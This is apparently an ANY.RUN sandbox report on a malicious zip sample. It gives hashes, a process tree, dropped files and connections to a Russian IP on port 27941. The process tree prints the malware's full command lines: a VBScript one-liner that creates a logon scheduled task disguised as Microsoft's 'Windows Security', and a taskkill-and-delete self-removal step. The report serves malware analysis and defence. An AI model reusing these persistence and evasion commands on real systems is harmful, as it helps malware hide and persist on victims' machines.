File name: | 7484076131.zip |
Full analysis: | https://app.any.run/tasks/56e52dd3-94d1-4bc8-83f9-3cb684d3712f |
Verdict: | Malicious activity |
Analysis date: | May 20, 2022, 17:23:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | A2924CF3292870BD0A63D96F23B77363 |
SHA1: | 951BF94009AA6C445B2058FE1883130A91623D40 |
SHA256: | 6CEE72904C3C3EFBD58857E33E18D18E6803F8B421AA8C154B422416BC0C3538 |
SSDEEP: | 3072:5I61FIayiF/JpatqpxKY1VMps27NEqPmY9vYB+06dm561k:i61FIGTake8CfpEqP5U+S61k |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792 |
---|---|
ZipUncompressedSize: | 234496 |
ZipCompressedSize: | 130869 |
ZipCRC: | 0x3bf9d17b |
ZipModifyDate: | 1980:00:00 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1580 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\7484076131.zip" | C:\Program Files\WinRAR\WinRAR.exe | Explorer.EXE | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 | ||||
268 | "C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" | C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe | Explorer.EXE | |
User: admin Integrity Level: MEDIUM Exit code: 4294967295 | ||||
1760 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" | C:\Windows\System32\cmd.exe | — | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3168 | "C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" | C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe | cmd.exe | |
User: admin Integrity Level: MEDIUM | ||||
3348 | "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 268 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" & exit | C:\Windows\System32\cmd.exe | — | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3556 | taskkill /F /PID 268 | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3712 | powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
1232 | "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & del C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs /f /q & exit | C:\Windows\System32\cmd.exe | — | Windows Security.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2028 | cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3256 | timeout 3 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1580 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb1580.8748\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792 | executable | |
MD5:F53673AEC0316B62EC1960799C371B6F | SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792 | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lq01kna4.zk1.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lhcdgcw3.cn3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
268 | f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe | C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe | executable | |
MD5:F53673AEC0316B62EC1960799C371B6F | SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792 | |||
1232 | cmd.exe | C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs | text | |
MD5:38BEE6EF6A8191DD08E6A79320F3D61D | SHA256:1F49C106C9535814D6D97AE50DD54757ACF8DC80D3331553F1DD70B104A21D2D | |||
1988 | powershell.exe | C:\Users\admin\AppData\Local\Temp\usriyqjn.flx.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1988 | powershell.exe | C:\Users\admin\AppData\Local\Temp\pxag0qbb.kkm.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3712 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mtqmvj5v.spv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3284 | powershell.exe | C:\Users\admin\AppData\Local\Temp\wqo22ebs.t3q.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 193.233.48.87:27941 | — | OOO FREEnet Group | RU | suspicious |
3168 | Windows Security.exe | 193.233.48.87:27941 | — | OOO FREEnet Group | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
dns.msftncsi.com |
| shared |